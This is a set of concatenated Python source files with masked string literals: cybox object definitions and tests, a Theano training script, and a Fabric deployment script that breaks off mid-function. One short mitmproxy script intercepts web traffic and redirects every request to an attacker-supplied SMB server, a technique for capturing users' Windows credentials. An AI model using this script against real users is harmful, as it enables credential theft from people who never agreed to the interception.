, String ) <EOL> transfer_encoding = fields . TypedField ( "<STR_LIT>" , String ) <EOL> vary = fields . TypedField ( "<STR_LIT>" , String ) <EOL> via = fields . TypedField ( "<STR_LIT>" , String ) <EOL> warning = fields . TypedField ( "<STR_LIT>" , String ) <EOL> www_authenticate = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_frame_options = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_xss_protection = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_content_type_options = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_powered_by = fields . TypedField ( "<STR_LIT>" , String ) <EOL> x_ua_compatible = fields . TypedField ( "<STR_LIT>" , String ) <EOL> class HTTPResponseHeader ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPResponseHeaderType <EOL> _namespace = "<STR_LIT>" <EOL> raw_header = fields . TypedField ( "<STR_LIT>" , String ) <EOL> parsed_header = fields . TypedField ( "<STR_LIT>" , HTTPResponseHeaderFields ) <EOL> class HTTPServerResponse ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPServerResponseType <EOL> _namespace = "<STR_LIT>" <EOL> http_status_line = fields . TypedField ( "<STR_LIT>" , HTTPStatusLine ) <EOL> http_response_header = fields . TypedField ( "<STR_LIT>" , <EOL> HTTPResponseHeader ) <EOL> http_message_body = fields . TypedField ( "<STR_LIT>" , HTTPMessage ) <EOL> class HTTPRequestResponse ( entities . Entity ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPRequestResponseType <EOL> _namespace = "<STR_LIT>" <EOL> ordinal_position = fields . TypedField ( "<STR_LIT>" ) <EOL> http_client_request = fields . TypedField ( "<STR_LIT>" , HTTPClientRequest ) <EOL> http_provisional_server_response = fields . TypedField ( "<STR_LIT>" , HTTPServerResponse ) <EOL> http_server_response = fields . TypedField ( "<STR_LIT>" , HTTPServerResponse ) <EOL> class HTTPSession ( ObjectProperties ) : <EOL> _binding = http_session_binding <EOL> _binding_class = http_session_binding . HTTPSessionObjectType <EOL> _namespace = "<STR_LIT>" <EOL> _XSI_NS = "<STR_LIT>" <EOL> _XSI_TYPE = "<STR_LIT>" <EOL> http_request_response = fields . TypedField ( "<STR_LIT>" , <EOL> HTTPRequestResponse , <EOL> multiple = True ) </s>
<s> from mixbox import fields <EOL> import cybox . bindings . win_critical_section_object as win_critical_section_binding <EOL> from cybox . common import ObjectProperties , HexBinary , NonNegativeInteger <EOL> class WinCriticalSection ( ObjectProperties ) : <EOL> _binding = win_critical_section_binding <EOL> _binding_class = win_critical_section_binding . WindowsCriticalSectionObjectType <EOL> _namespace = '<STR_LIT>' <EOL> _XSI_NS = "<STR_LIT>" <EOL> _XSI_TYPE = "<STR_LIT>" <EOL> address = fields . TypedField ( "<STR_LIT>" , HexBinary ) <EOL> spin_count = fields . TypedField ( "<STR_LIT>" , NonNegativeInteger ) </s>
<s> from mixbox import fields <EOL> import cybox . bindings . win_waitable_timer_object as win_waitable_timer_binding <EOL> from cybox . common import String , ObjectProperties <EOL> class WinWaitableTimer ( ObjectProperties ) : <EOL> _binding = win_waitable_timer_binding <EOL> _binding_class = win_waitable_timer_binding . WindowsWaitableTimerObjectType <EOL> _namespace = "<STR_LIT>" <EOL> _XSI_NS = "<STR_LIT>" <EOL> _XSI_TYPE = "<STR_LIT>" <EOL> security_attributes = fields . TypedField ( "<STR_LIT>" , String ) <EOL> name = fields . TypedField ( "<STR_LIT:Name>" , String ) <EOL> type_ = fields . TypedField ( "<STR_LIT>" , String ) </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from mixbox . vendor . six import StringIO <EOL> class CIQAddressTests ( unittest . TestCase ) : <EOL> def test_can_load_ciq_extension ( self ) : <EOL> from cybox . bindings . extensions . location import ciq_address_3_0 <EOL> addr = ciq_address_3_0 . CIQAddress3_0InstanceType ( ) <EOL> s = StringIO ( ) <EOL> addr . export ( s . write , <NUM_LIT:0> ) <EOL> xml = s . getvalue ( ) <EOL> self . assertEqual ( <NUM_LIT> , len ( xml ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> from mixbox . vendor . six import u <EOL> from cybox . objects . network_route_object import NetRoute <EOL> from cybox . test import EntityTestCase , round_trip <EOL> from cybox . test . objects import ObjectTestCase <EOL> class TestNetworkRoute ( ObjectTestCase , unittest . TestCase ) : <EOL> object_type = "<STR_LIT>" <EOL> klass = NetRoute <EOL> _full_dict = { <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:description>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : object_type , <EOL> } <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> import unittest <EOL> from mixbox . vendor . six import u <EOL> from cybox . objects . win_pipe_object import WinPipe <EOL> from cybox . test . objects import ObjectTestCase <EOL> class TestWinPipe ( ObjectTestCase , unittest . TestCase ) : <EOL> object_type = "<STR_LIT>" <EOL> klass = WinPipe <EOL> _full_dict = { <EOL> '<STR_LIT:name>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : <NUM_LIT:30> , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:10> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> '<STR_LIT>' : u ( "<STR_LIT>" ) , <EOL> '<STR_LIT>' : object_type , <EOL> } <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from libmproxy . protocol . http import HTTPResponse <EOL> from netlib . odict import ODictCaseless <EOL> """<STR_LIT>""" <EOL> def start ( context , argv ) : <EOL> if len ( argv ) != <NUM_LIT:2> and len ( argv ) != <NUM_LIT:3> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> context . smbserver_ip = argv [ <NUM_LIT:1> ] <EOL> if len ( argv ) == <NUM_LIT:3> : <EOL> context . identifier = argv [ <NUM_LIT:2> ] <EOL> else : <EOL> context . identifier = "<STR_LIT>" <EOL> def request ( context , flow ) : <EOL> should_redirect = True <EOL> if should_redirect is not None and should_redirect : <EOL> resp = HTTPResponse ( <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> ] , <EOL> <NUM_LIT> , <EOL> "<STR_LIT>" , <EOL> ODictCaseless ( [ [ "<STR_LIT:Content-Type>" , "<STR_LIT>" ] , [ "<STR_LIT>" , "<STR_LIT>" . format ( context . smbserver_ip , <EOL> context . identifier ) ] ] ) , <EOL> "<STR_LIT>" ) <EOL> flow . reply ( resp ) </s>
<s> import os <EOL> import sys <EOL> import argparse <EOL> import numpy as np <EOL> import theano . tensor as T <EOL> homepath = os . path . join ( '<STR_LIT:..>' , '<STR_LIT:..>' ) <EOL> if not homepath in sys . path : <EOL> sys . path . insert ( <NUM_LIT:0> , homepath ) <EOL> from dlearn . models . layer import FullConnLayer , ConvPoolLayer <EOL> from dlearn . models . nnet import NeuralNet <EOL> from dlearn . utils import actfuncs , costfuncs <EOL> from dlearn . utils . serialize import load_data , save_data <EOL> from dlearn . optimization import sgd <EOL> desctxt = """<STR_LIT>""" <EOL> dataset_txt = """<STR_LIT>""" <EOL> attr_txt = """<STR_LIT>""" <EOL> seg_txt = """<STR_LIT>""" <EOL> output_txt = """<STR_LIT>""" <EOL> parser = argparse . ArgumentParser ( description = desctxt ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , nargs = <NUM_LIT:1> , required = True , <EOL> metavar = '<STR_LIT:name>' , help = dataset_txt ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , nargs = <NUM_LIT:1> , required = True , <EOL> metavar = '<STR_LIT:name>' , help = attr_txt ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , nargs = <NUM_LIT:1> , required = True , <EOL> metavar = '<STR_LIT:name>' , help = seg_txt ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , nargs = '<STR_LIT:?>' , default = None , <EOL> metavar = '<STR_LIT:name>' , help = output_txt ) <EOL> args = parser . parse_args ( ) <EOL> def train_model ( dataset , attr_model , seg_model ) : <EOL> def shape_constrained_pooling ( fmaps ) : <EOL> s = fmaps . sum ( axis = [ <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> Z = abs ( actfuncs . tanh ( fmaps ) ) . sum ( axis = [ <NUM_LIT:2> , <NUM_LIT:3> ] ) <EOL> return s / Z <EOL> X = T . tensor4 ( ) <EOL> A = T . matrix ( ) <EOL> feature_layers = [ ] <EOL> feature_layers . append ( ConvPoolLayer ( <EOL> input = X , <EOL> input_shape = ( <NUM_LIT:3> , <NUM_LIT> , <NUM_LIT> ) , <EOL> filter_shape = ( <NUM_LIT:32> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:5> ) , <EOL> pool_shape = ( <NUM_LIT:2> , <NUM_LIT:2> ) , <EOL> active_func = actfuncs . tanh , <EOL> flatten = False , <EOL> W = attr_model . blocks [ <NUM_LIT:0> ] . _W , <EOL> b = <NUM_LIT:0.0> <EOL> ) ) <EOL> feature_layers . append ( ConvPoolLayer ( <EOL> input = feature_layers [ - <NUM_LIT:1> ] . output , <EOL> input_shape = feature_layers [ - <NUM_LIT:1> ] . output_shape , <EOL> filter_shape = ( <NUM_LIT:64> , <NUM_LIT:32> , <NUM_LIT:5> , <NUM_LIT:5> ) , <EOL> pool_shape = ( <NUM_LIT:2> , <NUM_LIT:2> ) , <EOL> active_func = actfuncs . tanh , <EOL> flatten = False , <EOL> W = attr_model . blocks [ <NUM_LIT:1> ] . _W , <EOL> b = <NUM_LIT:0.0> <EOL> ) ) <EOL> seg_layers = [ ] <EOL> seg_layers . append ( FullConnLayer ( <EOL> input = feature_layers [ - <NUM_LIT:1> ] . output . flatten ( <NUM_LIT:2> ) , <EOL> input_shape = np . prod ( feature_layers [ - <NUM_LIT:1> ] . output_shape ) , <EOL> output_shape = <NUM_LIT> , <EOL> dropout_ratio = <NUM_LIT:0.1> , <EOL> active_func = actfuncs . tanh , <EOL> W = seg_model . blocks [ <NUM_LIT:2> ] . _W , <EOL> b = seg_model . blocks [ <NUM_LIT:2> ] . _b <EOL> ) ) <EOL> seg_layers . append ( FullConnLayer ( <EOL> input = seg_layers [ - <NUM_LIT:1> ] . output , <EOL> input_shape = seg_layers [ - <NUM_LIT:1> ] . output_shape , <EOL> output_shape = <NUM_LIT> * <NUM_LIT> , <EOL> dropout_input = seg_layers [ - <NUM_LIT:1> ] . dropout_output , <EOL> active_func = actfuncs . sigmoid , <EOL> W = seg_model . blocks [ <NUM_LIT:3> ] . _W , <EOL> b = seg_model . blocks [ <NUM_LIT:3> ] . _b <EOL> ) ) <EOL> S = seg_layers [ - <NUM_LIT:1> ] . output <EOL> S = S * ( S >= <NUM_LIT:0.1> ) <EOL> S = S . reshape ( ( S . shape [ <NUM_LIT:0> ] , <NUM_LIT> , <NUM_LIT> ) ) <EOL> S = S . dimshuffle ( <NUM_LIT:0> , '<STR_LIT:x>' , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> S_dropout = seg_layers [ - <NUM_LIT:1> ] . dropout_output <EOL> S_dropout = S_dropout * ( S_dropout >= <NUM_LIT:0.1> ) <EOL> S_dropout = S_dropout . reshape ( ( S_dropout . shape [ <NUM_LIT:0> ] , <NUM_LIT> , <NUM_LIT> ) ) <EOL> S_dropout = S_dropout . dimshuffle ( <NUM_LIT:0> , '<STR_LIT:x>' , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> attr_layers = [ ] <EOL> '''<STR_LIT>''' <EOL> attr_layers . append ( FullConnLayer ( <EOL> input = shape_constrained_pooling ( feature_layers [ - <NUM_LIT:1> ] . output * S ) , <EOL> input_shape = feature_layers [ - <NUM_LIT:1> ] . output_shape , <EOL> output_shape = <NUM_LIT:64> , <EOL> dropout_input = shape_constrained_pooling ( <EOL> feature_layers [ - <NUM_LIT:1> ] . dropout_output * S_dropout ) , <EOL> dropout_ratio = <NUM_LIT:0.1> , <EOL> active_func = actfuncs . tanh , <EOL> W = attr_model . blocks [ <NUM_LIT:2> ] . _W , <EOL> b = attr_model . blocks [ <NUM_LIT:2> ] . _b <EOL> ) ) <EOL> attr_layers . append ( FullConnLayer ( <EOL> input = attr_layers [ - <NUM_LIT:1> ] . output , <EOL> input_shape = attr_layers [ - <NUM_LIT:1> ] . output_shape , <EOL> output_shape = <NUM_LIT:11> , <EOL> dropout_input = attr_layers [ - <NUM_LIT:1> ] . dropout_output , <EOL> active_func = actfuncs . sigmoid , <EOL> W = attr_model . blocks [ <NUM_LIT:3> ] . _W , <EOL> b = attr_model . blocks [ <NUM_LIT:3> ] . _b <EOL> ) ) <EOL> model = NeuralNet ( feature_layers + seg_layers + attr_layers , <EOL> X , attr_layers [ - <NUM_LIT:1> ] . output ) <EOL> model . target = A <EOL> model . cost = costfuncs . binxent ( attr_layers [ - <NUM_LIT:1> ] . dropout_output , A ) + <NUM_LIT> * model . get_norm ( <NUM_LIT:2> ) <EOL> model . error = costfuncs . binerr ( attr_layers [ - <NUM_LIT:1> ] . output , A ) <EOL> sgd . train ( model , dataset , lr = <NUM_LIT> , momentum = <NUM_LIT> , <EOL> batch_size = <NUM_LIT:100> , n_epochs = <NUM_LIT> , <EOL> epoch_waiting = <NUM_LIT:10> ) <EOL> return model <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> dataset_file = '<STR_LIT>' . format ( args . dataset [ <NUM_LIT:0> ] ) <EOL> attr_file = '<STR_LIT>' . format ( args . attribute [ <NUM_LIT:0> ] ) <EOL> seg_file = '<STR_LIT>' . format ( args . segmentation [ <NUM_LIT:0> ] ) <EOL> out_file = '<STR_LIT>' if args . output is None else '<STR_LIT>' . format ( args . output ) <EOL> dataset = load_data ( dataset_file ) <EOL> attr_model = load_data ( attr_file ) <EOL> seg_model = load_data ( seg_file ) <EOL> model = train_model ( dataset , attr_model , seg_model ) <EOL> save_data ( model , out_file ) </s>
<s> from copy import copy <EOL> from datetime import datetime <EOL> from os . path import basename , abspath , dirname , isfile , join <EOL> from fabric . api import env , puts , abort , cd , hide , task <EOL> from fabric . operations import sudo , settings , run <EOL> from fabric . contrib import console <EOL> from fabric . contrib . files import upload_template <EOL> from fabric . colors import _wrap_with , green <EOL> green_bg = _wrap_with ( '<STR_LIT>' ) <EOL> red_bg = _wrap_with ( '<STR_LIT>' ) <EOL> fagungis_path = dirname ( abspath ( __file__ ) ) <EOL> @ task <EOL> def setup ( ) : <EOL> if not test_configuration ( ) : <EOL> if not console . confirm ( "<STR_LIT>" % red_bg ( '<STR_LIT>' ) , default = False ) : <EOL> abort ( "<STR_LIT>" ) <EOL> if env . ask_confirmation : <EOL> if not console . confirm ( "<STR_LIT>" % red_bg ( env . project . upper ( ) ) , default = False ) : <EOL> abort ( "<STR_LIT>" ) <EOL> puts ( green_bg ( '<STR_LIT>' ) ) <EOL> start_time = datetime . now ( ) <EOL> _verify_sudo <EOL> _install_dependencies ( ) <EOL> _create_django_user ( ) <EOL> _setup_directories ( ) <EOL> _hg_clone ( ) <EOL> _install_virtualenv ( ) <EOL> _create_virtualenv ( ) <EOL> _install_gunicorn ( ) <EOL> _install_requirements ( ) <EOL> _upload_nginx_conf ( ) <EOL> _upload_rungunicorn_script ( ) <EOL> _upload_supervisord_conf ( ) <EOL> end_time = datetime . now ( ) <EOL> finish_message = '<STR_LIT>' % ( green_bg ( end_time . strftime ( '<STR_LIT>' ) ) , ( end_time - start_time ) . seconds ) <EOL> puts ( finish_message ) <EOL> @ task <EOL> def deploy ( ) : <EOL> if not test_configuration ( ) : <EOL> if not console . confirm ( "<STR_LIT>" % red_bg ( '<STR_LIT>' ) , default = False ) : <EOL> abort ( "<STR_LIT>" ) <EOL> _verify_sudo ( ) <EOL> if env . ask_confirmation : <EOL> if not console . confirm ( "<STR_LIT>" % red_bg ( env . project . upper ( ) ) , default = False ) : <EOL> abort ( "<STR_LIT>" ) <EOL> puts ( green_bg ( '<STR_LIT>' ) ) <EOL> start_time = datetime . now ( ) <EOL> hg_pull ( ) <EOL> _install_requirements ( ) <EOL> _upload_nginx_conf ( ) <EOL> _upload_rungunicorn_script ( ) <EOL> _upload_supervisord_conf ( ) <EOL> _prepare_django_project ( ) <EOL> _prepare_media_path ( ) <EOL> _supervisor_restart ( ) <EOL> end_time = datetime . now ( ) <EOL> finish_message = '<STR_LIT>' % ( green_bg ( end_time . strftime ( '<STR_LIT>' ) ) , ( end_time - start_time ) . seconds ) <EOL> puts ( finish_message ) <EOL> @ task <EOL> def hg_pull ( ) : <EOL> with cd ( env . code_root ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> @ task <EOL> def test_configuration ( verbose = True ) : <EOL> errors = [ ] <EOL> parameters_info = [ ] <EOL> if '<STR_LIT>' not in env or not env . project : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . project ) ) <EOL> if '<STR_LIT>' not in env or not env . repository : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . repository ) ) <EOL> if '<STR_LIT>' not in env or not env . hosts : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . hosts ) ) <EOL> if '<STR_LIT>' not in env or not env . django_user : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_user ) ) <EOL> if '<STR_LIT>' not in env or not env . django_user_group : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_user_group ) ) <EOL> if '<STR_LIT>' not in env or not env . django_user_home : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_user_home ) ) <EOL> if '<STR_LIT>' not in env or not env . projects_path : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . projects_path ) ) <EOL> if '<STR_LIT>' not in env or not env . code_root : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . code_root ) ) <EOL> if '<STR_LIT>' not in env or not env . django_project_root : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_project_root ) ) <EOL> if '<STR_LIT>' not in env or not env . django_project_settings : <EOL> env . django_project_settings = '<STR_LIT>' <EOL> if verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_project_settings ) ) <EOL> if '<STR_LIT>' not in env or not env . django_media_path : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_media_path ) ) <EOL> if '<STR_LIT>' not in env or not env . django_static_path : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . django_static_path ) ) <EOL> if '<STR_LIT>' not in env : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . south_used ) ) <EOL> if '<STR_LIT>' not in env or not env . virtenv : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . virtenv ) ) <EOL> if '<STR_LIT>' not in env or not env . virtenv_options : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . virtenv_options ) ) <EOL> if '<STR_LIT>' not in env or not env . requirements_file : <EOL> env . requirements_file = join ( env . code_root , '<STR_LIT>' ) <EOL> if verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . requirements_file ) ) <EOL> if '<STR_LIT>' not in env : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . ask_confirmation ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_bind : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_bind ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_logfile : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_logfile ) ) <EOL> if '<STR_LIT>' not in env or not env . rungunicorn_script : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . rungunicorn_script ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_workers : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_workers ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_worker_class : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_worker_class ) ) <EOL> if '<STR_LIT>' not in env or not env . gunicorn_loglevel : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . gunicorn_loglevel ) ) <EOL> if '<STR_LIT>' not in env or not env . nginx_server_name : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . nginx_server_name ) ) <EOL> if '<STR_LIT>' not in env or not env . nginx_conf_file : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . nginx_conf_file ) ) <EOL> if '<STR_LIT>' not in env or not env . nginx_client_max_body_size : <EOL> env . nginx_client_max_body_size = <NUM_LIT:10> <EOL> elif not isinstance ( env . nginx_client_max_body_size , int ) : <EOL> errors . append ( '<STR_LIT>' ) <EOL> if verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . nginx_client_max_body_size ) ) <EOL> if '<STR_LIT>' not in env or not env . nginx_htdocs : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . nginx_htdocs ) ) <EOL> if '<STR_LIT>' not in env : <EOL> env . nginx_https = False <EOL> elif not isinstance ( env . nginx_https , bool ) : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . nginx_https ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_program_name : <EOL> env . supervisor_program_name = env . project <EOL> if verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_program_name ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisorctl : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisorctl ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_autostart : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_autostart ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_autorestart : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_autorestart ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_redirect_stderr : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_redirect_stderr ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisor_stdout_logfile : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisor_stdout_logfile ) ) <EOL> if '<STR_LIT>' not in env or not env . supervisord_conf_file : <EOL> errors . append ( '<STR_LIT>' ) <EOL> elif verbose : <EOL> parameters_info . append ( ( '<STR_LIT>' , env . supervisord_conf_file ) ) <EOL> if errors : <EOL> if len ( errors ) == <NUM_LIT> : <EOL> '''<STR_LIT>''' <EOL> puts ( '<STR_LIT>' ) <EOL> else : <EOL> puts ( '<STR_LIT>' % len ( errors ) ) <EOL> puts ( '<STR_LIT>' % ( '<STR_LIT:->' * <NUM_LIT> , '<STR_LIT>' . join ( errors ) ) ) <EOL> puts ( '<STR_LIT:->' * <NUM_LIT> ) <EOL> puts ( '<STR_LIT>' ) <EOL> return False <EOL> elif verbose : <EOL> for parameter in parameters_info : <EOL> parameter_formatting = "<STR_LIT>" if isinstance ( parameter [ <NUM_LIT:1> ] , str ) else "<STR_LIT:%s>" <EOL> parameter_value = parameter_formatting % parameter [ <NUM_LIT:1> ] <EOL> puts ( '<STR_LIT>' % ( parameter [ <NUM_LIT:0> ] . ljust ( <NUM_LIT> ) , green ( parameter_value ) ) ) <EOL> puts ( '<STR_LIT>' ) <EOL> return True <EOL> def _create_django_user ( ) : <EOL> with settings ( hide ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , warn_only = True ) : <EOL> res = sudo ( '<STR_LIT>' % env ) <EOL> if '<STR_LIT>' in res : <EOL> puts ( '<STR_LIT>' % env ) <EOL> return <EOL> sudo ( '<STR_LIT>' % env ) <EOL> def _verify_sudo ( ) : <EOL> '''<STR_LIT>''' <EOL> sudo ( '<STR_LIT>' ) <EOL> def _install_nginx ( ) : <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" ) <EOL> def _install_dependencies ( ) : <EOL> '''<STR_LIT>''' <EOL> packages = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] <EOL> sudo ( "<STR_LIT>" ) <EOL> sudo ( "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( packages ) ) <EOL> if "<STR_LIT>" in env and env . additional_packages : <EOL> sudo ( "<STR_LIT>" % "<STR_LIT:U+0020>" . join ( env . additional_packages ) ) <EOL> _install_nginx ( ) <EOL> sudo ( "<STR_LIT>" ) <EOL> def _install_requirements ( ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in env and env . requirements_file : <EOL> virtenvsudo ( '<STR_LIT>' % env . requirements_file ) <EOL> def _install_gunicorn ( ) : <EOL> """<STR_LIT>""" <EOL> virtenvsudo ( '<STR_LIT>' ) <EOL> def _install_virtualenv ( ) : <EOL> sudo ( '<STR_LIT>' ) <EOL> def _create_virtualenv ( ) : <EOL> sudo ( '<STR_LIT>' % ( '<STR_LIT>' . join ( env . virtenv_options ) , env . virtenv ) ) <EOL> def _setup_directories ( ) : <EOL> sudo ( '<STR_LIT>' % env ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . gunicorn_logfile ) ) <EOL> sudo ( '<STR_LIT>' % ( env . django_user , dirname ( env . gunicorn_logfile ) ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . gunicorn_logfile ) ) <EOL> sudo ( '<STR_LIT>' % env . gunicorn_logfile ) <EOL> sudo ( '<STR_LIT>' % ( env . django_user , env . gunicorn_logfile ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . supervisor_stdout_logfile ) ) <EOL> sudo ( '<STR_LIT>' % ( env . django_user , dirname ( env . supervisor_stdout_logfile ) ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . supervisor_stdout_logfile ) ) <EOL> sudo ( '<STR_LIT>' % env . supervisor_stdout_logfile ) <EOL> sudo ( '<STR_LIT>' % ( env . django_user , env . supervisor_stdout_logfile ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . nginx_conf_file ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . supervisord_conf_file ) ) <EOL> sudo ( '<STR_LIT>' % dirname ( env . rungunicorn_script ) ) <EOL> sudo ( '<STR_LIT>' % env ) <EOL> sudo ( '<STR_LIT>' % env ) <EOL> sudo ( '<STR_LIT>' % env ) <EOL> def virtenvrun ( command ) : <EOL> activate = '<STR_LIT>' % env . virtenv <EOL> run ( activate + '<STR_LIT>' + command ) <EOL> def virtenvsudo ( command ) : <EOL> activate = '<STR_LIT>' % env . virtenv <EOL> sudo ( activate + '<STR_LIT>' + command ) <EOL> def _hg_clone ( ) : <EOL> sudo ( '<STR_LIT>' % ( env . repository , env . code_root ) ) <EOL> def _test_nginx_conf ( ) : <EOL> with settings ( hide ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , warn_only = True ) : <EOL> res = sudo ( '<STR_LIT>' ) <EOL> if 